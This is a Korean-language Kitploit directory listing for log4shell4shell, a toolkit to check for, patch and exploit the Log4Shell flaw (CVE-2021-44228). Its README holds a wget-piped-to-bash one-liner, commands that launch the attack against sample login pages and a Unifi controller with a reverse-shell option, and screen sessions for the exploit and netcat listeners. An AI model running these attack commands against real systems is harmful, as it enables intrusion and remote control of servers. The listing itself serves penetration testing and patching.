Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
log4shell4shell — Log4shell - 멀티 툴킷. 잠재적인 CVE-2021-44228 취약점을 찾고, 수정하고, 테스트합니다 - 셸에서 완전한 LOG4SHELL 테스트/공격 환경을 제공합니다 | Kitploit
도구/GitHubGitHub/suuhm/log4shell4shell
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - 멀티 툴킷. 잠재적인 CVE-2021-44228 취약점을 찾고, 수정하고, 테스트합니다 - 셸에서 완전한 LOG4SHELL 테스트/공격 환경을 제공합니다

저장소 보기
5104년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

log4shell4shell

Log4j - 멀티툴. 잠재적 CVE-2021-44228 취약점을 찾아 & 수정 - 완전한 LOG4SHELL 테스트/공격 환경을 제공합니다

썸네일

기능

  • Linux/Mac/BSD 및 Windows 시스템에서 CVE-2021-44228 취약점을 확인합니다.
  • log4j Java 클래스를 삭제하거나 일부 환경 변수를 설정하여 시스템을 수정합니다.
  • 개념 증명: 직접 익스플로잇을 테스트하기 위해 더미 스프링 부트 서버를 실행할 수 있습니다 (https://github.com/christophetd/log4shell-vulnerable-app)
  • 원하는 IP-Port에 대해 공격을 실행하고 Base64 명령 / 또는 간단한 리버스 셸을 포함할 수 있습니다.
  • https://github.com/fullhunt/log4j-scan 을 통한 전체 IP 범위 스캔

Linux/Mac/BSD에서 실행하는 방법:

요구 사항:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

다음 원라이너로 시스템을 빠르게 확인하세요:

wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

추가 옵션

IP: 10.4.4.20 포트 8080 로그인 페이지를 대상으로 샘플 공격 및 추가적으로 리버스 프록시 셸 실행:

git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

Exploit-Server 셸에서 일부 공격 정보를 보려면 screen -r l4s4s-ldap-srv 및/또는 screen -r l4s4s-nc-rsh 를 실행하세요:

IP: 10.4.4.20 포트 8080 전체 검사 및 추가적으로 모든 테스트 시도:

./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Tomcat Springboot 서버에서 개념 증명 실행:

./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Unifi-Controller 익스플로잇 공격/확인 실행 (10.4.4.20:8443):

./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

사용 가능한 모든 옵션

_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Wrong input! Please enter one of these options:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

Linux 및/또는 macOS python 버전을 업그레이드하는 방법:

내 헬퍼 스크립트(--list-versions)를 실행하세요: ./python-upgrader.sh

Windows x86 / x64에서 실행하는 방법:

Powershell(관리자 모드)에서 실행하세요: .\set_windows_fix.ps1

이 스크립트는 알파 버전입니다! 문제가 있으면 알려주세요

법적 고지

log4shell4shell 프로젝트는 교육적 및 윤리적 테스트 목적으로만 제작되었습니다. 사전 상호 동의 없이 대상을 공격하기 위해 log4j-scan을 사용하는 것은 불법입니다. 최종 사용자는 해당 지역, 주 및 연방 법률을 모두 준수할 책임이 있습니다. 개발자는 어떠한 책임도 지지 않으며 이 프로그램으로 인한 오용이나 피해에 대해 책임을 지지 않습니다.

도구 다운로드